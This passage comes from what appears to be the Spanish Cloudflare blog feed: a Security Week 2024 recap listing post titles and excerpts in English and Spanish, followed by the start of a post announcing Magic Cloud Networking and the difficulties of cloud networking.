    <td><span>We released a natural language assistant as part of Security Analytics. Now it is easier than ever to get powerful insights about your applications by exploring log and security events using the new natural language query interface.</span></td>
  </tr>
  <tr>
    <td><a href="http://staging.blog.mrk.cfdata.org/dispelling-the-generative-ai-fear-how-cloudflare-secures-inboxes-against-ai-enhanced-phishing/"><span>Dispelling the Generative AI fear: how Cloudflare secures inboxes against AI-enhanced phishing</span></a></td>
    <td><span>Generative AI is being used by malicious actors to make phishing attacks much more convincing. Learn how Cloudflare’s email security systems are able to see past the deception using advanced machine learning models.</span></td>
  </tr>
</tbody>
</table><p>Puesto</p>
<table>
<thead>
  <tr>
    <th><span>Title</span></th>
    <th><span>Excerpt</span></th>
  </tr>
</thead>
<tbody>
  <tr>
    <td><a href="http://staging.blog.mrk.cfdata.org/introducing-magic-cloud-networking"><span>Magic Cloud Networking simplifies security, connectivity, and management of public clouds</span></a></td>
    <td><span>Introducing Magic Cloud Networking, a new set of capabilities to visualize and automate cloud networks to give our customers easy, secure, and seamless connection to public cloud environments.</span></td>
  </tr>
  <tr>
    <td><a href="http://staging.blog.mrk.cfdata.org/security-insights-quick-ciso-view/"><span>Secure your unprotected assets with Security Center: quick view for CISOs</span></a></td>
    <td><span>Security Center now includes new tools to address a common challenge: ensuring comprehensive deployment of Cloudflare products across your infrastructure. Gain precise insights into where and how to optimize your security posture.</span></td>
  </tr>
  <tr>
    <td><a href="http://staging.blog.mrk.cfdata.org/dlp-ocr-sourcecode/"><span>Announcing two highly requested DLP enhancements: Optical Character Recognition (OCR) and Source Code Detections</span></a></td>
    <td><span>Cloudflare One now supports Optical Character Recognition and detects source code as part of its Data Loss Prevention service. These two features make it easier for organizations to protect their sensitive data and reduce the risks of breaches.</span></td>
  </tr>
  <tr>
    <td><a href="http://staging.blog.mrk.cfdata.org/cf1-user-risk-score/"><span>Introducing behavior-based user risk scoring in Cloudflare One</span></a></td>
    <td><span>We are introducing user risk scoring as part of Cloudflare One, a new set of capabilities to detect risk based on user behavior, so that you can improve security posture across your organization.</span></td>
  </tr>
  <tr>
    <td><a href="http://staging.blog.mrk.cfdata.org/eliminate-vpn-vulnerabilities-with-cloudflare-one/"><span>Eliminate VPN vulnerabilities with Cloudflare One</span></a></td>
    <td><span>The Cybersecurity &amp; Infrastructure Security Agency issued an Emergency Directive due to the Ivanti Connect Secure and Policy Secure vulnerabilities. In this post, we discuss the threat actor tactics exploiting these vulnerabilities and how Cloudflare One can mitigate these risks. </span></td>
  </tr>
  <tr>
    <td><a href="http://staging.blog.mrk.cfdata.org/zero-trust-warp-with-a-masque/"><span>Zero Trust WARP: tunneling with a MASQUE</span></a></td>
    <td><span>This blog discusses the introduction of MASQUE to Zero Trust WARP and how Cloudflare One customers will benefit from this modern protocol. </span></td>
  </tr>
  <tr>
    <td><a href="http://staging.blog.mrk.cfdata.org/collect-all-your-cookies-in-one-jar/"><span>Collect all your cookies in one jar with Page Shield Cookie Monitor</span></a></td>
    <td><span>Protecting online privacy starts with knowing what cookies are used by your websites. Our client-side security solution, Page Shield, extends transparent monitoring to HTTP cookies.</span></td>
  </tr>
  <tr>
    <td><a href="http://staging.blog.mrk.cfdata.org/gatway-protocol-detection"><span>Protocol detection with Cloudflare Gateway</span></a><span> </span></td>
    <td><span>Cloudflare Secure Web Gateway now supports the detection, logging, and filtering of network protocols using packet payloads without the need for inspection. </span></td>
  </tr>
  <tr>
    <td><a href="http://staging.blog.mrk.cfdata.org/threat-intel-rfi-pir/"><span>Introducing Requests for Information (RFIs) and Priority Intelligence Requirements (PIRs) for threat intelligence teams</span></a></td>
    <td><span>Our Security Center now houses Requests for Information and Priority Intelligence Requirements. These features are available via API as well and Cloudforce One customers can start leveraging them today for enhanced security analysis. </span></td>
  </tr>
</tbody>
</table><p>Extracto</p>
<table>
<thead>
  <tr>
    <th><span>Title</span></th>
    <th><span>Excerpt</span></th>
  </tr>
</thead>
<tbody>
  <tr>
    <td><a href="http://staging.blog.mrk.cfdata.org/log-explorer/"><span>Log Explorer: monitor security events without third-party storage</span></a></td>
    <td><span>With the combined power of Security Analytics and Log Explorer, security teams can analyze, investigate, and monitor logs natively within Cloudflare, reducing time to resolution and overall cost of ownership by eliminating the need of third-party logging systems.</span></td>
  </tr>
  <tr>
    <td><a href="http://staging.blog.mrk.cfdata.org/deskope-program-and-asdp-for-descaler/"><span>Simpler migration from Netskope and Zscaler to Cloudflare: introducing Deskope and a Descaler partner update</span></a></td>
    <td><span>Cloudflare expands the Descaler program to Authorized Service Delivery Partners (ASDPs). Cloudflare is also launching Deskope, a new set of tooling to help migrate existing Netskope customers to Cloudflare One.</span></td>
  </tr>
  <tr>
    <td><a href="http://staging.blog.mrk.cfdata.org/protecting-apis-with-jwt-validation/"><span>Protecting APIs with JWT Validation</span></a></td>
    <td><span>Cloudflare customers can now protect their APIs from broken authentication attacks by validating incoming JSON Web Tokens with API Gateway.</span></td>
  </tr>
  <tr>
    <td><a href="http://staging.blog.mrk.cfdata.org/announcing-express-cni"><span>Simplifying how enterprises connect to Cloudflare with Express Cloudflare Network Interconnect</span></a></td>
    <td><span>Express Cloudflare Network Interconnect makes it fast and easy to connect your network to Cloudflare. Customers can now order Express CNIs directly from the Cloudflare dashboard.</span></td>
  </tr>
  <tr>
    <td><a href="http://staging.blog.mrk.cfdata.org/treating-sase-anxiety/"><span>Cloudflare treats SASE anxiety for VeloCloud customers</span></a></td>
    <td><span>The turbulence in the SASE market is driving many customers to seek help. We’re doing our part to help VeloCloud customers who are caught in the crosshairs of shifting strategies.</span></td>
  </tr>
  <tr>
    <td><a href="http://staging.blog.mrk.cfdata.org/free-network-monitoring-for-enterprise"><span>Free network flow monitoring for all enterprise customers</span></a></td>
    <td><span>Announcing a free version of Cloudflare’s network flow monitoring product, Magic Network Monitoring. Now available to all Enterprise customers.</span></td>
  </tr>
  <tr>
    <td><a href="http://staging.blog.mrk.cfdata.org/guide-to-cloudflare-pages-and-turnstile-plugin/"><span>Building secure websites: a guide to Cloudflare Pages and Turnstile Plugin</span></a></td>
    <td><span>Learn how to use Cloudflare Pages and Turnstile to deploy your website quickly and easily while protecting it from bots, without compromising user experience. </span></td>
  </tr>
  <tr>
    <td><a href="http://staging.blog.mrk.cfdata.org/waf-content-scanning-for-malware-detection/"><span>General availability for WAF Content Scanning for file malware protection</span></a></td>
    <td><span>Announcing the General Availability of WAF Content Scanning, protecting your web applications and APIs from malware by scanning files in-transit.</span></td>
  </tr>
</tbody>
</table><p><a href="/es-es/firewall-for-ai-es-es/">Cloudflare anuncia Firewall for AI</a></p>
<table>
<thead>
  <tr>
    <th><span>Title</span></th>
    <th><span>Excerpt</span></th>
  </tr>
</thead>
<tbody>
  <tr>
    <td><a href="http://staging.blog.mrk.cfdata.org/protecting-global-democracy-against-threats-from-emerging-technology"><span>Cloudflare protects global democracy against threats from emerging technology during the 2024 voting season</span></a></td>
    <td><span>At Cloudflare, we’re actively supporting a range of players in the election space by providing security, performance, and reliability tools to help facilitate the democratic process.</span></td>
  </tr>
  <tr>
    <td><a href="http://staging.blog.mrk.cfdata.org/navigating-the-maze-of-magecart/"><span>Navigating the maze of Magecart: a cautionary tale of a Magecart impacted website</span></a></td>
    <td><span>Learn how a sophisticated Magecart attack was behind a campaign against e-commerce websites. This incident underscores the critical need for a strong client side security posture.</span></td>
  </tr>
  <tr>
    <td><a href="http://staging.blog.mrk.cfdata.org/building-urlscanner/"><span>Cloudflare’s URL Scanner, new features, and the story of how we built it</span></a></td>
    <td><span>Discover the enhanced URL Scanner API, now integrated with the Security Center Investigate Portal. Enjoy unlisted scans, multi-device screenshots, and seamless integration with the Cloudflare ecosystem. </span></td>
  </tr>
  <tr>
    <td><a href="http://staging.blog.mrk.cfdata.org/secure-by-design-principles/"><span>Changing the industry with CISA’s Secure by Design principles</span></a></td>
    <td><span>Security considerations should be an integral part of software’s design, not an afterthought. Explore how Cloudflare adheres to Cybersecurity &amp; Infrastructure Security Agency’s Secure by Design principles to shift the industry.</span></td>
  </tr>
  <tr>
    <td><a href="http://staging.blog.mrk.cfdata.org/pq-2024/"><span>The state of the post-quantum Internet</span></a></td>
    <td><span>Nearly two percent of all TLS 1.3 connections established with Cloudflare are secured with post-quantum cryptography. In this blog post we discuss where we are now in early 2024, what to expect for the coming years, and what you can do today.</span></td>
  </tr>
  <tr>
    <td><a href="http://staging.blog.mrk.cfdata.org/advanced-dns-protection/"><span>Advanced DNS Protection: mitigating sophisticated DNS DDoS attacks</span></a></td>
    <td><span>Introducing the Advanced DNS Protection system, a robust defense mechanism designed to protect against the most sophisticated DNS-based DDoS attacks.</span></td>
  </tr>
</tbody>
</table><p>Cloudflare ha anunciado el desarrollo de Firewall para IA, una capa de protección que puede implementarse delante de modelos de lenguaje de gran tamaño (LLM) para identificar los intentos de abuso y los ataques.</p>
<table>
<thead>
  <tr>
    <th><span>Title</span></th>
    <th><span>Excerpt</span></th>
  </tr>
</thead>
<tbody>
  <tr>
    <td><a href="http://staging.blog.mrk.cfdata.org/linux-kernel-hardening/"><span>Linux kernel security tunables everyone should consider adopting</span></a></td>
    <td><span>This post illustrates some of the Linux kernel features that are helping Cloudflare keep its production systems more secure. We do a deep dive into how they work and why you should consider enabling them.</span></td>
  </tr>
  <tr>
    <td><a href="http://staging.blog.mrk.cfdata.org/securing-cloudflare-with-cloudflare-zero-trust"><span>Securing Cloudflare with Cloudflare: a Zero Trust journey</span></a></td>
    <td><span>A deep dive into how we have deployed Zero Trust at Cloudflare while maintaining user privacy.</span></td>
  </tr>
  <tr>
    <td><a href="http://staging.blog.mrk.cfdata.org/network-performance-update-security-week-2024"><span>Network performance update: Security Week 2024</span></a><span> </span></td>
    <td><span>Cloudflare is the fastest provider for 95th percentile connection time in 44% of networks around the world. We dig into the data and talk about how we do it.</span></td>
  </tr>
  <tr>
    <td><a href="http://staging.blog.mrk.cfdata.org/harnessing-office-chaos"><span>Harnessing chaos in Cloudflare offices</span></a><span> </span></td>
    <td><span>This blog discusses the new sources of “chaos” that have been added to LavaRand and how you can make use of that harnessed chaos in your next application.</span></td>
  </tr>
  <tr>
    <td><a href="http://staging.blog.mrk.cfdata.org/email-security-insights-on-cloudflare-radar"><span>Launching email security insights on Cloudflare Radar</span></a><span> </span></td>
    <td><span>The new Email Security section on Cloudflare Radar provides insights into the latest trends around threats found in malicious email, sources of spam and malicious email, and the adoption of technologies designed to prevent abuse of email.</span></td>
  </tr>
</tbody>
</table><p><a href="/es-es/defensive-ai-es-es/">IA defensiva: marco de Cloudflare para proteger contra las amenazas de nueva generación</a></p><p>La IA defensiva es el marco que Cloudflare utiliza al integrar sistemas inteligentes en sus soluciones. Los modelos de IA de Cloudflare analizan los patrones de tráfico de los clientes, a fin de proporcionar a la organización una estrategia de defensa personalizada y exclusiva para su entorno.</p><p><a href="/es-es/security-analytics-ai-assistant-es-es/">Cloudflare lanza AI Assistant para los análisis de seguridad</a></p><div>
  
</div>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/3S3nnZ6qfB6QnJAe9OwthD/05721dea96b2b756c5ab1989660293e3/image1-31.png" />
            
            </figure><p>Hemos lanzado un asistente de lenguaje natural como parte de Security Analytics. Ahora es más fácil que nunca beneficiarse de información útil acerca de tus aplicaciones explorando los eventos de registro y de seguridad mediante la nueva interfaz de consultas en lenguaje natural.</p><p><a href="/es-es/dispelling-the-generative-ai-fear-how-cloudflare-secures-inboxes-against-ai-enhanced-phishing-es-es/">Disipamos el miedo a la IA generativa: cómo Cloudflare protege las bandejas de entrada contra el phishing creado con IA</a></p><p>Los ciberdelincuentes están usando la IA generativa para que los ataques de phishing parezcan mucho más convincentes. Descubre cómo los sistemas de seguridad del correo electrónico de Cloudflare pueden ir más allá de la detección del fraude de con el uso de modelos avanzados de aprendizaje automático.</p>
    <div>
      <h3>Mantener la visibilidad y el control mientras evolucionan las aplicaciones y la nube</h3>
      <a href="#mantener-la-visibilidad-y-el-control-mientras-evolucionan-las-aplicaciones-y-la-nube">
        
      </a>
    </div>
    <p>.tg {border-collapse:collapse;border-color:#ccc;border-spacing:0;} .tg td{background-color:#fff;border-color:#ccc;border-style:solid;border-width:1px;color:#333; font-family:Arial, sans-serif;font-size:14px;overflow:hidden;padding:10px 5px;word-break:normal;} .tg th{background-color:#f0f0f0;border-color:#ccc;border-style:solid;border-width:1px;color:#333; font-family:Arial, sans-serif;font-size:14px;font-weight:normal;overflow:hidden;padding:10px 5px;word-break:normal;} .tg .tg-f50w{background-color:#F90;font-weight:bold;text-align:left;vertical-align:top} .tg .tg-zb5k{color:#15C;text-align:left;text-decoration:underline;vertical-align:top} .tg .tg-zb5k a{border-bottom: 0} .tg .tg-0lax{text-align:left;vertical-align:top}</p><p>Puesto</p><p>Extracto</p><p><a href="/introducing-magic-cloud-networking">Magic Cloud Networking simplifica la seguridad, la conectividad y la gestión de las nubes públicas</a></p><p>Descubre Magic Cloud Networking, un nuevo conjunto de capacidades para visualizar y automatizar las redes en la nube con el fin de ofrecer a nuestros clientes una conexión segura, fácil y eficaz a los entornos de nube pública.</p><p><a href="/es-es/security-insights-quick-ciso-view-es-es/">Protege tus activos expuestos con nuestro Centro de seguridad: resumen para los CISO</a></p><p>El Centro de seguridad incluye ahora nuevas herramientas para abordar un desafío común: garantizar una implementación completa de los productos de Cloudflare en toda tu infraestructura. Benefíciate de información precisa sobre dónde y cómo optimizar tu postura de seguridad.</p><p><a href="/dlp-ocr-sourcecode/">Mejoramos el servicio DLP con dos funciones muy solicitadas: el reconocimiento óptico de caracteres (OCR) y la detección de código fuente</a></p><p>Cloudflare One admite ahora el reconocimiento óptico de caracteres y detecta el código fuente como parte de su servicio de prevención de pérdida de datos. Estas dos características facilitan a las organizaciones la protección de sus datos confidenciales y reducen los riesgos de violación.</p><p><a href="/cf1-user-risk-score/">Novedad: Puntuación de riesgo del usuario basada en el comportamiento en Cloudflare One</a></p><p>Presentamos la puntuación de riesgo del usuario como parte de Cloudflare One, un nuevo conjunto de capacidades para detectar el riesgo en función del comportamiento del usuario, para que puedas mejorar tu postura de seguridad en toda tu organización.</p><p><a href="/eliminate-vpn-vulnerabilities-with-cloudflare-one/">Elimina las vulnerabilidades de las VPN con Cloudflare One</a></p><p>La Agencia de Ciberseguridad y Seguridad de las Infraestructuras (CISA) ha publicado una directiva de emergencia debido a las vulnerabilidades en las soluciones Ivanti Connect Secure y Policy Secure. En esta publicación, analizamos las tácticas de los actores de amenazas que explotan estas vulnerabilidades y cómo Cloudflare One puede mitigar estos riesgos.</p><p><a href="/zero-trust-warp-with-a-masque/">Zero Trust WARP: creación de túneles con MASQUE</a></p><p>En este blog analizamos la incorporación de MASQUE a Zero Trust WARP y cómo los clientes de Cloudflare One se beneficiarán de este moderno protocolo.</p><p><a href="/collect-all-your-cookies-in-one-jar/">Reúne tus cookies con Page Shield Cookie Monitor</a></p><p>La protección de la privacidad en línea empieza por saber qué cookies utilizan tus sitios web. Nuestra solución de seguridad del lado del cliente, Page Shield, amplía la supervisión transparente a las cookies HTTP.</p><p><a href="/gatway-protocol-detection">Detección de protocolos con Cloudflare Gateway</a></p><p>Cloudflare Secure Web Gateway admite ahora la detección, el registro y el filtrado de protocolos de red mediante la carga útil de paquetes sin necesidad de inspección.</p><p><a href="/threat-intel-rfi-pir/">Novedad: Solicitudes de información (RFI) y requerimientos prioritarios de inteligencia (PIR) para los equipos de información sobre amenazas</a></p><p>Nuestro centro de seguridad incluye ahora solicitudes de información y requerimientos prioritarios de inteligencia. Estas funciones también están disponibles a través de la API y los clientes de Cloudforce One ya pueden empezar a utilizarlas para mejorar los análisis de seguridad.</p>
    <div>
      <h3><b>Consolidar para reducir los costes</b></h3>
      <a href="#consolidar-para-reducir-los-costes">
        
      </a>
    </div>
    <p>.tg {border-collapse:collapse;border-color:#ccc;border-spacing:0;} .tg td{background-color:#fff;border-color:#ccc;border-style:solid;border-width:1px;color:#333; font-family:Arial, sans-serif;font-size:14px;overflow:hidden;padding:10px 5px;word-break:normal;} .tg th{background-color:#f0f0f0;border-color:#ccc;border-style:solid;border-width:1px;color:#333; font-family:Arial, sans-serif;font-size:14px;font-weight:normal;overflow:hidden;padding:10px 5px;word-break:normal;} .tg .tg-f50w{background-color:#F90;font-weight:bold;text-align:left;vertical-align:top} .tg .tg-zb5k{color:#15C;text-align:left;text-decoration:underline;vertical-align:top} .tg .tg-zb5k a{border-bottom: 0} .tg .tg-0lax{text-align:left;vertical-align:top}</p><p>Puesto</p><p>Extracto</p><p><a href="/log-explorer/">Log Explorer supervisa los eventos de seguridad sin almacenamiento de terceros</a></p><p>Con la eficiencia conjunta de Security Analytics y Log Explorer, los equipos de seguridad pueden analizar, investigar y supervisar los registros de forma nativa en Cloudflare. De esta forma, conseguimos reducir el tiempo de resolución y el coste total de propiedad, ya que eliminamos la necesidad de sistemas de registro de terceros.</p><p><a href="/deskope-program-and-asdp-for-descaler/">Facilitamos la migración de Netskope y Zscaler a Cloudflare con el lanzamiento de Deskope y la ampliación del programa Descaler</a></p><p>Cloudflare amplía el programa Descaler a los socios de prestación de servicios autorizados (ASDP). Además, lanzamos Deskope, un nuevo conjunto de herramientas para ayudar a migrar a los clientes existentes de Netskope a Cloudflare One.</p><p><a href="/protecting-apis-with-jwt-validation/">Protección de las API con la validación de JWT</a></p><p>Los clientes de Cloudflare ya pueden proteger sus API contra los ataques por fallos de autenticación mediante la validación de los tokens web JSON entrantes con API Gateway.</p><p><a href="/announcing-express-cni">Simplificamos la forma en la que las empresas se conectan a Cloudflare con Express Cloudflare Network Interconnect</a></p><p>Express Cloudflare Network Interconnect acelera y simplifica la conexión de tu red a Cloudflare. Ahora los clientes pueden solicitar Express CNI directamente desde el panel de control de Cloudflare.</p><p><a href="/treating-sase-anxiety/">Cloudflare da respuesta a la preocupación de los clientes de VeloCloud por las soluciones SASE</a></p><p>La inestabilidad del mercado de SASE está llevando a muchos clientes a buscar ayuda. Estamos poniendo de nuestra parte para ayudar a los clientes de VeloCloud que se están viendo afectados por los cambios en las estrategias.</p><p><a href="/free-network-monitoring-for-enterprise">Supervisión gratuita del flujo de red para todos los clientes Enterprise</a></p><p>Anunciamos una versión gratuita del producto de supervisión de flujos de red de Cloudflare, Magic Network Monitoring. Ya está disponible para todos los clientes del plan Enterprise.</p><p><a href="/guide-to-cloudflare-pages-and-turnstile-plugin/">Creación de sitios web seguros: guía sobre Cloudflare Pages y el complemento Turnstile</a></p><p>Aprende a utilizar Cloudflare Pages y Turnstile para implementar tu sitio web de forma rápida y sencilla, al tiempo que lo proteges de los bots, sin afectar la experiencia del usuario.</p><p><a href="/waf-content-scanning-for-malware-detection/">Disponibilidad general de WAF Content Scanning para la protección contra malware de archivos</a></p><p>Anunciamos la disponibilidad general de WAF Content Scanning, nuestra solución para proteger tus aplicaciones web y API del malware a través del análisis de archivos en tránsito.</p><p><a href="/threat-intel-rfi-pir/">Novedad: Solicitudes de información (RFI) y requerimientos prioritarios de inteligencia (PIR) para los equipos de información sobre amenazas</a></p><p>Nuestro centro de seguridad incluye ahora solicitudes de información y requerimientos prioritarios de inteligencia. Estas funciones también están disponibles a través de la API y los clientes de Cloudforce One ya pueden empezar a utilizarlas para mejorar los análisis de seguridad.</p>
    <div>
      <h3>¿Cómo puedo ayudar a mejorar Internet?</h3>
      <a href="#como-puedo-ayudar-a-mejorar-internet">
        
      </a>
    </div>
    <p>.tg {border-collapse:collapse;border-color:#ccc;border-spacing:0;} .tg td{background-color:#fff;border-color:#ccc;border-style:solid;border-width:1px;color:#333; font-family:Arial, sans-serif;font-size:14px;overflow:hidden;padding:10px 5px;word-break:normal;} .tg th{background-color:#f0f0f0;border-color:#ccc;border-style:solid;border-width:1px;color:#333; font-family:Arial, sans-serif;font-size:14px;font-weight:normal;overflow:hidden;padding:10px 5px;word-break:normal;} .tg .tg-f50w{background-color:#F90;font-weight:bold;text-align:left;vertical-align:top} .tg .tg-zb5k{color:#15C;text-align:left;text-decoration:underline;vertical-align:top} .tg .tg-zb5k a{border-bottom: 0} .tg .tg-0lax{text-align:left;vertical-align:top}</p><p>Puesto</p><p>Extracto</p><p><a href="/es-es/protecting-global-democracy-against-threats-from-emerging-technology-es-es/">Cloudflare protege la democracia mundial contra las amenazas de la tecnología emergente en la época de elecciones de 2024</a></p><p>En Cloudflare, apoyamos activamente a los protagonistas de los procesos electorales con herramientas de seguridad, rendimiento y fiabilidad para ayudar a facilitar el proceso democrático.</p><p><a href="/navigating-the-maze-of-magecart/">Cómo entender el laberinto de Magecart: lección aprendida de un sitio web afectado por Magecart</a></p><p>Descubre cómo un sofisticado ataque Magecart estaba detrás de una campaña contra sitios web de comercio electrónico. Este incidente subraya la necesidad crítica de una postura de seguridad sólida en el lado del cliente.</p><p><a href="/building-urlscanner/">URL Scanner de Cloudflare, descubre nuevas funciones y lo que hay detrás de este desarrollo</a></p><p>Descubre la API mejorada de URL Scanner, ahora integrada con el portal de investigación del centro de seguridad. Benefíciate de análisis privados, capturas de pantalla multidispositivo y de una integración eficaz dentro del ecosistema de Cloudflare.</p><p><a href="/es-es/secure-by-design-principles-es-es/">Transformamos la industria con los principios de seguridad por diseño de la CISA</a></p><p>Las cuestiones de seguridad deben ser una parte integral del diseño de software, no algo que deba dejarse al azar. Descubre cómo Cloudflare se adhiere a los principios de seguridad por diseño de la Agencia de Ciberseguridad y Seguridad de las Infraestructuras para cambiar el sector.</p><p><a href="/pq-2024/">El estado de la red de Internet poscuántica</a></p><p>Casi el 2 % de todas las conexiones TLS 1.3 establecidas con Cloudflare están protegidas con criptografía poscuántica. En esta entrada del blog evaluamos la situación en la que nos encontramos a principios de 2024, qué podemos esperar para los próximos años y qué puedes hacer hoy.</p><p><a href="/es-es/advanced-dns-protection-es-es/">Advanced DNS Protection: mitigación de ataques DDoS sofisticados contra el DNS</a></p><p>Descubre el sistema Advanced DNS Protection, un sólido mecanismo de defensa diseñado para proteger contra los ataques DDoS más sofisticados al DNS.</p>
    <div>
      <h3>Compartir cómo lo hacemos en Cloudflare</h3>
      <a href="#compartir-como-lo-hacemos-en-cloudflare">
        
      </a>
    </div>
    <p>.tg {border-collapse:collapse;border-color:#ccc;border-spacing:0;} .tg td{background-color:#fff;border-color:#ccc;border-style:solid;border-width:1px;color:#333; font-family:Arial, sans-serif;font-size:14px;overflow:hidden;padding:10px 5px;word-break:normal;} .tg th{background-color:#f0f0f0;border-color:#ccc;border-style:solid;border-width:1px;color:#333; font-family:Arial, sans-serif;font-size:14px;font-weight:normal;overflow:hidden;padding:10px 5px;word-break:normal;} .tg .tg-f50w{background-color:#F90;font-weight:bold;text-align:left;vertical-align:top} .tg .tg-zb5k{color:#15C;text-align:left;text-decoration:underline;vertical-align:top} .tg .tg-zb5k a{border-bottom: 0} .tg .tg-0lax{text-align:left;vertical-align:top}</p><p>Puesto</p><p>Extracto</p><p><a href="/linux-kernel-hardening/">Ajustes de seguridad del kernel de Linux que todo el mundo debería considerar adoptar</a></p><p>Esta publicación muestra algunas de las funciones del kernel de Linux, que nos están ayudando a mantener nuestros sistemas de producción más seguros. Analizaremos cómo funcionan y por qué tú también deberías considerar activarlas.</p><p><a href="/securing-cloudflare-with-cloudflare-zero-trust">Nuestras soluciones nos protegen: nuestro recorrido Zero Trust</a></p><p>Analizamos la implementación de Zero Trust en Cloudflare manteniendo la privacidad del usuario.</p><p><a href="/network-performance-update-security-week-2024">Security Week 2024: Novedad sobre el rendimiento de la red</a></p><p>Cloudflare es el proveedor más rápido en lo que respecta al tiempo de conexión del percentil 95 en el 44 % de las redes de todo el mundo. Analicemos los datos y hablemos de cómo lo hacemos.</p><p><a href="/harnessing-office-chaos">Cómo sacamos partido al caos en las oficinas de Cloudflare</a></p><p>Esta publicación analiza las nuevas fuentes de "caos" añadidas a LavaRand y cómo puedes utilizar ese caos sacándole partido en tu próxima aplicación.</p><p><a href="/email-security-insights-on-cloudflare-radar">Lanzamiento: información de la seguridad del correo electrónico en Cloudflare Radar</a></p><p>La nueva sección sobre seguridad del correo electrónico en Cloudflare Radar proporciona información sobre las últimas tendencias en torno a las amenazas que se encuentran en el correo electrónico malicioso, en las fuentes de spam y en el correo electrónico malintencionado, y sobre la adopción de tecnologías diseñadas para evitar el abuso del correo electrónico.</p>
    <div>
      <h3>Unas palabras finales</h3>
      <a href="#unas-palabras-finales">
        
      </a>
    </div>
    <p>Gracias por acompañarnos esta semana. Permanece atento a nuestra próxima Semana de la Innovación a principios de abril, que estará dedicada a la comunidad de desarrolladores.</p> ]]></content:encoded>
            <category><![CDATA[Security Week]]></category>
            <category><![CDATA[Zero Trust]]></category>
            <category><![CDATA[Seguridad de aplicaciones]]></category>
            <category><![CDATA[Seguridad del correo electrónico]]></category>
            <category><![CDATA[AI]]></category>
            <guid isPermaLink="false">19BXuTqacKLPSyjHFzhyxF</guid>
            <dc:creator>Daniele Molteni</dc:creator>
            <dc:creator>Ankur Aggarwal</dc:creator>
        </item>
        <item>
            <title><![CDATA[Magic Cloud Networking simplifica la seguridad, la conectividad y la gestión de las nubes públicas]]></title>
            <link>https://blog.cloudflare.com/es-es/introducing-magic-cloud-networking/</link>
            <pubDate>Wed, 06 Mar 2024 14:01:00 GMT</pubDate>
            <description><![CDATA[ Descubre Magic Cloud Networking, un nuevo conjunto de capacidades para visualizar y automatizar las redes en la nube con el fin de ofrecer a nuestros clientes una conexión segura, fácil y eficaz a los entornos de nube pública ]]></description>
            <content:encoded><![CDATA[ <p>Hoy nos complace anunciar Magic Cloud Networking, una solución optimizada por la tecnología innovadora de <a href="https://www.cloudflare.com/press-releases/2024/cloudflare-enters-multicloud-networking-market-unlocks-simple-secure/">Nefeli Networks</a>, que hemos adquirido recientemente. Estas nuevas capacidades para visualizar y automatizar las redes en la nube proporcionarán a nuestros clientes conexiones seguras, fáciles y eficaces a los entornos de nube pública.</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/4EE4QTE18JtBWAk0XucBb2/818464eba98f9928bbfa7bfe179780d8/image5-5.png" />
            
            </figure><p>Las nubes públicas ofrecen a las organizaciones una infraestructura informática escalable y a la carta, sin los gastos y los recargos que conllevan la gestión de su propio centro de datos. La red en la nube es fundamental para las aplicaciones que han migrado a la nube, pero su gestión es complicada sin un software de automatización, especialmente cuando se opera a escala en varias cuentas en la nube. Magic Cloud Networking utiliza conceptos conocidos para proporcionar una única interfaz que controla y unifica las capacidades de red nativas de numerosos proveedores de nube a fin de crear redes de nube fiables, rentables y seguras.</p><p>El enfoque de Nefeli respecto a las redes multinube resuelve el problema relacionado con el desarrollo y el funcionamiento de las redes integrales dentro y entre nubes públicas, permitiendo a las organizaciones aprovechar de forma segura la aplicación que abarca cualquier combinación de recursos internos y externos. La incorporación de la tecnología de Nefeli facilitará más que nunca a nuestros clientes la conexión y la protección de sus usuarios, redes privadas y aplicaciones.</p>
    <div>
      <h2>¿Por qué es difícil crear redes en la nube?</h2>
      <a href="#por-que-es-dificil-crear-redes-en-la-nube">
        
      </a>
    </div>
    <p>En comparación con la red tradicional de un centro de datos local, la red en la nube promete simplicidad:</p><ul><li><p>Gran parte de la complejidad de las redes físicas se omite a los usuarios porque las capas física y de ethernet no forman parte del servicio de red expuesto por el proveedor de nube.</p></li><li><p>Hay menos protocolos de plano de control. En su lugar, los proveedores de nube ofrecen una red sencilla <a href="https://www.cloudflare.com/learning/network-layer/what-is-sdn/">definida por software (SDN)</a> totalmente programable mediante API.</p></li><li><p>Hay capacidad, menor y mayor, disponible al instante y a la carta, que pagas por uso.</p></li></ul><p>Sin embargo, esa promesa aún no se ha cumplido plenamente. Nuestros clientes han descrito varias razones por las que las redes en la nube son difíciles:</p><ul><li><p><b>Escasa visibilidad integral</b>: el uso de herramientas de visibilidad de la red en la nube es difícil y existen silos incluso dentro de un mismo proveedor de nube que impiden la supervisión y la resolución de problemas de extremo a extremo.</p></li><li><p><b>Avanzan a un ritmo mayor</b>: los enfoques tradicionales de gestión informática son incompatibles con la promesa de la nube: implementación instantánea disponible bajo demanda. Es necesario sustituir los conocidos procedimientos de ClickOps y basados en CLI (interfaz de línea de comando) por la automatización para satisfacer las necesidades de las empresas.</p></li><li><p><b>Tecnología diferente</b>: la transición que llevan a cabo las arquitecturas de red establecidas en entornos locales a una nube pública no es sencilla. La falta de protocolos de plano de control avanzado y de capa de ethernet era crítica en muchos diseños de red.</p></li><li><p><b>Nuevos modelos de costes</b>: los modelos de costes dinámicos de la nube pública, basados en el pago por uso, no son compatibles con los enfoques establecidos en torno a circuitos de coste fijo y amortización de 5 años. A menudo, las soluciones de red suelen desarrollarse con limitaciones financieras y, en consecuencia, tienen sentido otros enfoques arquitectónicos en la nube.</p></li><li><p><b>Nuevos riesgos de seguridad</b>: la protección de las nubes públicas con un modelo real <a href="https://www.cloudflare.com/learning/security/glossary/what-is-zero-trust/">Zero Trust</a> y mínimo privilegio exige procesos operativos maduros y automatización, así como conocimiento de las políticas específicas de la nube y los controles IAM.</p></li><li><p><b>Multiproveedor:</b> a menudo, las redes empresariales han utilizado la contratación de un único proveedor para facilitar la interoperabilidad, la eficacia operativa y la contratación y formación específicas. Operar una red que se extiende más allá de una única nube, a otras nubes o entornos locales, es un escenario multiproveedor.</p></li></ul><p>Nefeli consideró todos estos problemas y los conflictos entre las distintas perspectivas de los clientes para identificar dónde debía resolverse el problema.</p>
    <div>
      <h2>Trenes, aviones y automatización</h2>
      <a href="#trenes-aviones-y-automatizacion">
        
      </a>
    </div>
